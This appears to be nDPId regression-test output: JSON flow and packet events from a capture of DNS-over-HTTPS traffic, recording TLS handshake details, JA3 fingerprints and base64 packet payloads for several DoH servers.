{"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739298533,"flow_last_seen":946739298533,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739298533,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00841{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946739298533,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"thread_ts_msec":946739298533,"pkt":"REREREREZmZmZmZmCABFAAFD4UdAAL0GsQQKAAABi2PeSNGqAbt5f9qX6vvArlAYAfYrngAAFgMBARYBAAESAwPY4R+kmwrmRkwkOvmL20MZvvmmXV\/QYaA6X4C5e+GFvyA2SDuI+F1GOq7qyiEw+aePhhElQVpDVzMYXSdiyok3WQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACjAAAAEgAQAAANZG9oLTIuc2VieS5pbwAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACA0hS9OEA\/J5twwMByNtSlpgrCPJW9Ooqwd+S9NxEdaCw=="} 
+00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739298533,"flow_last_seen":946739298533,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739298533,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh-2.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02379{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":946739298797,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":946739298797,"pkt":"ZmZmZmZmRERERERECABFAAWq1TBAACsGSrWLY95ICgAAAQG70arq+8CueX\/bslAQAfmvXQAAFgMDAHoCAAB2AwOWvrm4FPC7V7PYuN+Lshod\/nezEzfqc01CK\/K8f2FrjCA2SDuI+F1GOq7qyiEw+aePhhElQVpDVzMYXSdiyok3WRMBAAAuACsAAgMEADMAJAAdACDl61zVHhMWB0BdL3ddlBFKSw5Lr9HVe6EkVLOcYVLAAxQDAwABARcDAwAksgraFQq8T84jfrRmYc223NGnVGbYG\/xj8xk4v\/EJCHm3s9w1FwMDCVmg97DgSdnn53nb0jGLv9F1+4VVO1DlJvFZ4CsfAqRyJ8a0jMqAaeRjhyCNwiDpU+6mevWKgpxWfYNjWShazkI7oaAh0ocoGs0\/Z2Mwn5ZIkIv+OuDwieAM9qTwhi+fGVM4H+qU8v3e8TtrqoxC+IgZVc8V3I+\/yPEjroPH33YYxxjju5aqvElJCjEI4urJQzXoWsAq6uQKccy5WfzKSDhJNZ8AVPquU8SpWKmo\/\/E2qD+dKLWJFgaub29gXMXjQTVzoJxdvVKG52mcWm6EXETLAVeqYVAn1jxtrmpkg13Vk85sRN2hjK5eeu4ap8rf7Lodf5tfmhv8SVfULmdGCNmmvgZMJkjmNfdKrw+XnrBHNQP2GC7kgKzhx++y9Ur+
7CtcaZ0Stuv2mMWKbTn30OOZzAWiYjVeWw1PNj6IPMesZYC3bO1PwS8+BOlQEPumskRErqRklUuVJ1OXsXJn8o9P7B9r5RxumsKPZbrYuGjTJfVUwTIwaAH4g\/GODGK2+B5YB\/Z\/6LysjXxF0obthFSDlDUGBTCdDZdGFQyyl8u0xri2sr4xv5TWFpIjmyYys6SXqhW7QRXi8cM\/fGE\/JM+qZpyddar8bHdCLxGlvvPz4eCxh6lg0sugzb6K+mUo6W7gtEoQaKMIAakeMy2FOKQ3NMe5\/F+3b43gHog099YK8NKs2bvSG\/W7LXyo8PnUinj+AVLnzhrSe+qvDBw9a\/Jp7AkHbVoQwt\/EIF5\/d5w+4KMlJPMSzCUov8rfi\/CCF\/iVjvModtxk+gLz4pUaK3XRZHYtLxfH7FHcLizTZ3sSU4i+tweqvPEyxXE1E7Y+KMLDCV+QkbWkWi9gMec8ZJ3GBnIg+iSrehGCt8i8t7Lu9Wc\/2fGKgQfE9jJe\/fDA2odknuy5GV2960tQvEZAXB0c5GJBhjiPYJgYdgJ2fzUt\/xLgBoWg0zKHa\/soHWqBrLympLp+VepVMyzuzIJ6QgGVTCC1EFSrrSUxkNXDsBrwmyRP\/9FLF9pdzZACXTb6S8myrZazmvEdGdk04PjNhUiHGlUT03OYvmagf8Ya\/4VRzGGdV43OAGkQYeu0ZY\/heh9h7fucuCFB8CyBx4wy7OhYHBnDOYz2gdf\/z49N039rzJarMWXOwbROgeoXzcsBH8Uj6StZMCbM\/ZBGWByfEjHDl5w8E1dbyJx5XuC65RezHZrv05dJlBbVSEsHIMbDl7IWOUdhpeDNskZrQ+GdU5boLCtHmvrbs62KT\/zlJm2mOApHTvifRvmqKBz9tPtGNCG6XGCZWhEY3FFyS9rmcTpceJwTCfQYlzYKZslhMKd4J63ankp0RnGQLgodwM35ISK98+Kq2hNOJCTBOCxPPsHuXjZuhXdIi8QCW9VQZqww\/\/NjZPMOPy4jcZ7Tkixh7\/JmbpMEV7PnrhAXh21z+u5dLFH52pKdwGRat6A94UDcInit5rOcJtblnF8P7F8IlQqF3WFZurZBuXzllHTzbwe54UUGPwrqwyOIUkW6zUYU\/09YfhXdyYwY1MnGRAlrE9sPr4V9Vgn7ZntvhQgmKz\/jiHNHuRGaj\/PJAjEPTmoQib9SfYaA5fyYDQmsautNL\/cJ4oyfD9Jembyctib1BIp9Ramfe6PSsBXI\/0Ka52Or"} +00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739298533,"flow_last_seen":946739298797,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":1693,"flow_avg_l4_payload_len":846,"midstream":1,"thread_ts_msec":946739298797,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"doh-2.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02292{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":946739298797,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1408,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1408,"pkt_l4_len":1374,"thread_ts_msec":946739298797,"pkt":"ZmZmZmZmRERERERECABFAAVy1TFAACsGSuyLY95ICgAAAQG70arq+8YweX\/bslAYAfkcrQAAThemFBuD34j0ZojpR7nDk08tEILyrSrE7HS0zZ4kmhXJJxPvCajO9mPz0f1Ba7CUeJZuC\/ww3Lrn+zD28CW1o9VT3LiWNj\/tk7IhVjR3oxyzXVyp8GIUKoCq+rFgLmVNv3t4E9NSsp0vzaP0F7j0JBrlPSojRxE2tlZsJ5feSSYzKGVucsWX6pYRquGlpuPfdHODx0L8ifTKNZ7sMGSXufTYU71W7zucIJWTJn92oiP3KQmXtYYb39SlVhRkoPmox0CcWIbUIkPk1mOfiZj7ZHZGdjmSkO+stoE+mAIy1qeh6xhTg7nyjAGvTt0OEbSBbL64py0gHtL8p9MnYDH\/rEu94PzROteC\/nq08LwZZof+0aydUgoyNJpYIzziL6obgZ8r3XFfT2yBZeGRYlK+7j980Fzg4IJlxXjB\/7u4t3CFM2KzwkVTOl0QgQ2WdVMZr63UzYIuBqVeqhjDwph8EAIPfj6GHii36awX1ARUIn+i2we8pqEICyjrrtz5abqrvBqhOgUymt9799jpjN96PN89rSa+qz8R5hSWva8Z0q12NMSUqK4V32q2T+XbFuVZUlGqNPo8Q4LGFZXuYD0rXuNudeUYIvyeE2j5uqdZqZHCJg4amyAZz0RTts0c1\/NYqX2y5hPaOLvInAlZn4kgRx8P3JUIFzzVPNJJ35uuAChT5mattKXxu8qwume7sBZMgcO4xIk9V0GeDf7Q0iqbxG1cZybv7JIhiCiaIbji819I0oDOejGbK2XffVEsRj3+LURpVM8fUmFAk669Ff\/Nr+yt6tH9Ktz6qOevm0rhgviDIUwzLNJNTxk3pvt9wNVus\/LUfcLiMKspToabUtDV2KtFlgjUQBZ6M603sQeMbcyD6v4zye6TReEZisbYDNmcge+IFl+e+6gIZYcwnBnjL+IMuKODuiRDaCLQJS72LiQoTClqyWNhk8p3nZX4LJsLVi6dW6cV7ErhFynQJtxWGrvo9DrmvbJGRV80Ul449jTrc22WvgTBKnaXTTsv2pw69IL3ziatAlwA6VUKivZyuSnP\/qeqQsLIM3h1xsud7x+raSQILbisV46QaEMOKNMhEo4f9EE5vYtzwm\/ngKP6CEyyxa5eOnqoj72FpXRNgDKcpbuNQSddL+rkopq\/y8uRR5TATut5xq9zEjEQLnRu3bhaqmLH7wPAre5tejGNaBElH9ZorCCzrnrfL+5ZFV65djnMn\/burxQW9SIIOlDcRe3d
dZxIf\/z8dXGWfc\/YJ2alVKWABNBLcFPeFubCnDOGFnp7WaEezUQCo1huX1d\/AR2t9ZFIxb+\/2YA0Fcu4FFOucBmHB64h34YnG1QktWj0QN6yNlW1E24ubX3xPextdjh4av9ufsqLyV+lQC34GqCFKa3D2btbNVuYlf3F\/nsdPHHCRn+svJvZKssoO39MnIg20E8\/NZSYgAW7+dMxM2JbTCDpQf718V5e42Tcc3D\/MVuwLpSLFUnGgbahF3PvczhUvo5QFk5tF0YRiH+1QJX+P4Bld+SLzREBNKhff3\/yg9uJJKca+U+6nBcDAwCBaMxAcfS4h68NX8O4\/JsJCa+QWF87yNO9r0+szCZ1TeWGW\/KMvQNFzX1G+Y2PEnQ68hI4LpJQIC4VjBdW13rCggF8QR46NY3HL4enM7oteZTlqkQvxVphVmRyDsYFcjY4u2fGUw5LFrsQktQhx2VsQTygsXipX2KtdmPdscHLlgGRFwMDADV5C7WBlZ+ocDTA\/zppOjhaktsCXwO0sG+1hu0Zi0K+GaWwxXTJGdG0p2vdDlGf4dOI0eNxTQ=="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299058,"flow_last_seen":946739299058,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739299058,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53676,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00839{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":946739299058,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"thread_ts_msec":946739299058,"pkt":"REREREREZmZmZmZmCABFAAFDIvZAAL0Gb1YKAAABi2PeSNGsAbu+7R6jIfk4pVAYAfYrngAAFgMBARYBAAESAwOSQ8JxHhGuu6wLKnGtwDfaCU9fn2zkXyLvCqG6Z1EJrSA97l3xa4NDBUHApuStJw5z26JVCZKgohlNqcovRpE62AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACjAAAAEgAQAAANZG9oLTIuc2VieS5pbwAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACBvduxHcveHyzSwUHe1UMoR3WO30Q1YJASO6Gqd5f5rOQ=="} +00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299058,"flow_last_seen":946739299058,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739299058,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53676,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh-2.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+02367{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":946739299325,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":946739299325,"pkt":"ZmZmZmZmRERERERECABFAAWq+oRAACsGJWGLY95ICgAAAQG70awh+Tilvu0fvlAQAflBFAAAFgMDAHoCAAB2AwO4E1L4A\/\/vaa3qFy7zGtkSllYVpFARFReL8E9wQ5edfiA97l3xa4NDBUHApuStJw5z26JVCZKgohlNqcovRpE62BMBAAAuACsAAgMEADMAJAAdACC6hi7aKoaulrg0kHVy9iX3JtIXsjOWFqMY4JtXoR3ZFBQDAwABARcDAwAkVn7ui3VtyEjBPho8csX4cWU91LDHlldd37yMDuMkm1WrNSA\/FwMDCVkNxERPpxFp1hU3MTygH94nI+uO3MFA6Pgc7Cjgsqv9R94L1LzqnlTJ9qM2GdC3DoaCFMZy2rvnd3TUb44js1wH\/ZjR\/tueYjuCchsydXsjOJIItHXpv6rNdoQc5GxilmSN3ZLV0BdssW6zhxxgQaE3FYajxWXTTfgzUzOS+6W++jmvd1q00zg+8Q0qSguzfNUtyikLzjXqF591w71tmw1RwueDWDRqOR8D9ArOOASC\/gfHKocbf3MYoPn\/L3+LeyjDo7Dan2mPuEUKlItjagedNzassvjfnCKDfWzjTYX1Oj074zzZKYUi326SCBVqvZ4BTAJFklyVRE2\/7w5a9Hu3TkucSU4uD6YDgHvYuwr1PUeuJlpLcTtMIe6KqdQO6VhykmmEfKtsuoqKDau0V16KSQWM2aCvsVesKQ3DSQJg5rL5yIwj9vpyWnaHxDEgfEIDmYjy\/Axgsm7vfVWFF3Jrfc1xzCpgVx2Wzxxl\/maZOzNTYwZUTU3hLDZjHHXTyifvb45snBjXrLw3E9kNt6T2lmZ7d2lzBq35OqiFyiqDdqg5nN+wvKg6FFTseFXwn\/Cnava4JqwJeCYBLZwtvjbxpmY\/Z7bzc6mZPg2Sh+dbDSkCl3bi0C7OGN4lTKk6SakWyrfvl60M9dBFHVDrzgKu7xbDvPEvSNcZq2Dx1QXy2oMyLZnD977uZ9nLe2MaP79hLJNgy4v+jriXtA5fuVRTABndd0eLGpCNoQRcyQEasclWVE0X3djEYjD5W2s+8ID+COBoWOoyP\/WAq9bDmdFuLbZL5YcQMg6OEX37+6VcGXh24mzLjiWqRW2SXZBECP5e9Kp+qBc4nsLJy+\/cCFFzWnnOIeDNkPzITjeYYG62LLpDcjihxenHjNkU8aI6W9z7HJRAKXj15JybI7ZavgKdsyBJSz8Rv17E9WgwJgE24FqtNa6LcXPjCIVJ4JA\/FRIvlJbq2\/PV2grzaPllz7EIQXESn4AAbsSK6v\/afg1rifhsSGv2yYjxwtRB5P9D+FT0dFjO2m9zDYEYLvFPNAv2\/uEF0d+ML9zrDfaDdz6z+wzZI7tOXb+ZgoELySqXWnZpXCKfAbAaRdkBWG9n\/7DEkPQfGc3BRuxecF3gZRN5TjRNnS3L\/z3Mjd0kgq5NvuPBzwr++r8PkzDyv4SrhrEho0ZXiTGQlO7AUNavDHJ2E6WcvB6wH6w+nDu+LafkJwVBrA3g2ry2AgWQYQlCtuH3p4tS5epl0vy3sOsnzjbAIulHq4VIitq5pO3s+sczN
2QL3hoGMgZmvfNYCCppei2sMRM3JeTXdDamDavAss5ffhc7o9sFzFOhYwBHF3K+RDvF+\/0hY+kvloFXPT7w5qyKb029c\/+Vu3kK8iCqQMpkd\/Y7fPVoDJRSebia6NkOtp0QF10Wqdh2s0768F9ux8l3ns6Ahcvm\/CEcnhylTvqF1H8nFLoIPnLNfkqliriwfEB7qB8aB8psWMvXozj1u+xw79vKaBVDClx5kPg1ndY1UZCkXuVmLOZwvxWWc0tuTJcMVug1lNwCPKGUEoQ6IRWLIe8NCbqmkI6bW\/5Xu20soyB9iTbKgsh2xLBekpYgVl8gT8VGJflOjydyD64I9+T\/dXz5zy\/0oPQP9q2vSa5j"} +00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739299058,"flow_last_seen":946739299325,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":1693,"flow_avg_l4_payload_len":846,"midstream":1,"thread_ts_msec":946739299325,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53676,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh-2.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+02291{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":946739299325,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1406,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1406,"pkt_l4_len":1372,"thread_ts_msec":946739299325,"pkt":"ZmZmZmZmRERERERECABFAAVw+oVAACsGJZqLY95ICgAAAQG70awh+T4nvu0fvlAYAfmmIAAAiW51QuqEfobYElojzNdmal3NmvuNd\/aotOFuZKIcd+01MY62EHH7E56\/oxK0qr9J58d7Jfc491vr3AkBsKJZSE5EN1LMlpXioNrse464nnbj5nYCt1y8iJtaYVHfHT9x8ujbG\/T2N6ZekRm+ONP3O7xw3rubgw7ubQJF\/KHEiRVFPrbIwq5RI7VTRdfrd3b9Fc\/71kitl8ImBckYsh09FSa2nRQrqALNG43BNA+FPS+D4bALfGJGztFq32s2D2cWRj2vno7VjQQWYQsz+9R40cUHWMbbW0anf7aLopYHYwhAUnxfUJyLSGv\/hcuY1JoGSes4gPPm0w\/KvSPUfmH1XOcuJRdoXdElY5F\/m9je9IUq8euoPyf0PXU\/w6wn+q9PJNYNblwNWPVkVSF6bp87Ycrz+bZvhmrk3ipYYu58\/qf3ItMXsHiYNDHVbyhTOrrT84X2uXkA5ajgilxkHZCWJdDIvRFwT++59P5vI4krRFU0SPX1eygQdMslXLsxvfqQATVp3sK76bt8qHa8rMRVLCfPA3UPe8Z9q\/JNBVvEPCwFBWQICqqCApD7kqMSclaEy89K83LVugXlNfNOargw6YlUR36QNrsco2xSkkpbYZSag+guZDt8NaBOAQqx6Dtx5yS9ZeM2TaZ4Tva3cH5WwTw3nwMfyBrZkmKclliFlyL+l3\/Ft\/1cAhtU5U7a4LgYVbdqsQxRVbeUPAwUZ68y2BGyj5Xg8Mtci4mPsgh+bnyNL5K5y9jSltRS79PDJA87B7hqXTRUrELkxjFWaMPAzghsENt\/UjelVjAgSWUxzpqxPV+2hED3HVp9LJOBmZIcSEVN1eWHazkX+mtW2m+0GAsZaxamutLzgJh\/DRJa7Jw23fjV9PCXnj9MWSdJstPENtBI0OVh7PH0+uAGt1zxMdGzUgBU2QlNOO7S4UuYD0Y26DtfRFNsa3yyMMJMA4d1B+99D0rLBp+YTr6CIQlSGW7\/MY0mGzKXnXLKEBMjIoE76aJQADNrOQ1pUsHUbMNYSxpurIgJZbgBG3OALLoptMECW3PsCTpgXkQ2OmVE11D882PmbdA0f4acC7LQATIGoxF7ZIVK6E9Vi5\/LR0AueJFdtzLq+oc1+GpS8l4A7KvQzJjHl8BFVtlJFp5Ft91g8c86AHAIukg5AmfSwO3K4Rq0SXUs8KcP29aiI1bA7\/K0iAEMbAiDcRNwXEEo+uNEfshUZQDIyZoBHdLzMTL\/2s9ouLF90mtZTkbub4ko0oHCp0UBuhgnfDbrA69yTnP91yV8UR8xswBSaiV12vmMHeXGGKIJ6dQbgPNn5OzZbyefQz5\/sH6dHxYbcGGfd+8wSxfEi7DokbKnmTmetH85RkCusy06sJkhFgf9bhlEmk63Cet5cz7Z7ea9PrtiS\/xOPZoAmLR8AcrBNB\/tHpNVlFcTM+gO6pHXXYSwt1o+rdQxZT4lFn7kVxmARBzEGQB8TIogOkRi0YtdMrX\/cAGbQWx0wllwfDL\/JIISbxKwU
NTT45zepGk3OVcnv0694KsAM6Pujlm7XvrZ+hcDAwB\/JlZfTL2CfKHweE8ivDA\/8Dj4s9MhpgBrmwa3P4sMMqXQFKgI6jQB7iGhbQGftnSVKI+QCxWleTjngiVWQbRq4xwswRPPuCr\/EteohSIpdjvjIjT4EQlykWjN3TxUSVyvVSA8Rp0nUkHXzRzNgRwt1EKIchjIYekan95L5wPtZxcDAwA1P8zjtyfqh9OaAN1qf+msLEHbyvTYhKC4e6LNeICCaSA3aHIsCQ1pZdcK52vQiTVTlBfFsLw="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304432,"flow_last_seen":946739304432,"flow_idle_time":7560000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"thread_ts_msec":946739304432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.95.218.42","src_port":50614,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00864{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":946739304432,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":352,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":352,"pkt_l4_len":318,"thread_ts_msec":946739304432,"pkt":"REREREREZmZmZmZmCABFAAFSUVZAAL0GFwkKAAABuV\/aKsW2AbtqjRCaK20m8FAYAfZViwAAFgMBASUBAAEhAwPqrEqAFBwbSYnmd5FQ4vhXWCXQOM7WSA+ydz5Uq2T7jCDruFBRjE\/ZRtIlov08nzXX8Izc\/f7Ut++FjeF3CgO25wAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACyAAAAIQAfAAAcZG5zLmRpZ2l0YWxlLWdlc2VsbHNjaGFmdC5jaAAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACDBZSA439npt9wjB\/Qij4hgUYqoHU3i8\/GsiDYDjRoMEQ=="} 
+00917{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304432,"flow_last_seen":946739304432,"flow_idle_time":7560000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"thread_ts_msec":946739304432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.95.218.42","src_port":50614,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.digitale-gesellschaft.ch","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +04390{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":946739304474,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739304474,"pkt":"ZmZmZmZmRERERERECABFAAuA8Y9AADUG9KG5X9oqCgAAAQG7xbYrbSbwao0RxFAQAfVfuQAAFgMDAHoCAAB2AwMcSuw\/xeEh9B9zohSBYXmLCSdYelc0PZguMzAQLdc5lyDruFBRjE\/ZRtIlov08nzXX8Izc\/f7Ut++FjeF3CgO25xMCAAAuACsAAgMEADMAJAAdACA9LiT1RQf61DUAcNgmrd9PJwh2JRIEeJ2AayVwYZe0VRQDAwABARcDAwAkpkFL6pYrY48v\/7oiAzlOAXfNYnXJT5\/VQ9ye3Jhdgfb\/qFcIFwMDDINDI+OvHUF+FRNUcqHGAtixa5OM3ESWY04brG7N5Xjztm8RaH\/MawsGpkLkwKimhVGQ6ciJhhX175QbHhfhLL45mnkevxxrQGot9ty+fzwVg7GUUCbrsUr32l6TD4OY9EXQQSyuoBvDePneEphgFWs2uB\/zEFQxJzZvf194T3VRrMXZftbpf\/YmEhwWBzhFxCXz7FBI47mE4BFAjuyUMEWUzwiwE55sybcBJQIrcz91caVnRcYmA1Wi1qK5uHVbVaqkF1jIcRZS6+N+xmFq9MBtbs1TttpF6z36PG19i1g1CIx8xl4wpaYvqDA7QOoSL5x3PMqBtb0k4c3Q\/zEwDdawR+TYy7hNCaHkQ1sAWum3cmh
